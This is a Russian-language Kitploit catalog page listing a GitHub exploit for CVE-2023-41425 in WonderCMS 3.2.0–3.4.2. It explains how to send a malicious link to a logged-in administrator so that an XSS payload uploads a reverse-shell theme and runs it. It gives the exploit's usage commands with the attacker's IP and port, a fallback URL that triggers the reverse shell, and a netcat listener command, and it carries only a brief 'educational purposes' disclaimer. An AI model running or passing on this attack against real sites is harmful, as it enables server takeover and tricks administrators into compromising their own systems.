Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Xss-инъекция, WonderCMS 3.2.0 -3.4.2 | Kitploit
Инструменты/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-41425-WonderCMS-Authenticated-RCE

Xss-инъекция, WonderCMS 3.2.0 -3.4.2

Репозиторий
11 год назадЕщё не проверено

CVE-2023-41425-WonderCMS-Authenticated-RCE

Описание

WonderCMS v3.2.0 - v3.4.2 уязвима. Удалённые злоумышленники могут получить полный контроль над сервером с помощью эксплуатации межсайтового скриптинга (Cross-Site Scripting, XSS) (только в образовательных целях). Вот план действий:

Как это работает:

Эксплойт злоупотребляет компонентом installModule в WonderCMS, чтобы внедрить специально созданный скрипт, выполняющий произвольный код.

Подготовка

  • Инструмент: exploit.py
  • Что вам нужно:
    • URL цели, где установлена WonderCMS (пароль администратора не требуется).
    • IP-адрес вашей машины атакующего.
    • Порт для вашего слушателя reverse shell.

Пошаговое выполнение

  1. Скрипт генерирует файл xss.js. Это JavaScript-оружие предназначено для эксплуатации отражённого XSS.
  2. Он выводит вредоносную ссылку. Вы отправите её администратору.
  3. Магия происходит, когда администратор (вошедший в систему пользователь) открывает или нажимает на вашу ссылку:
  • Фоновые запросы отправляются без его согласия.
  • Полезная нагрузка reverse shell загружается с помощью функции загрузки тем/плагинов.
  1. После загрузки полезная нагрузка выполняется и даёт вам соединение reverse shell напрямую с целевым сервером.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Пример

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Запасной вариант:

Если reverse shell не срабатывает автоматически, просто перейдите по адресу:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

Примечание:

Не забудьте запустить слушатель с помощью следующей команды:

root@kitploit:~
nc -lvp 4444

Благодарность

prodigiousMind за обнаружение и сообщение об уязвимости https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Скачать инструмент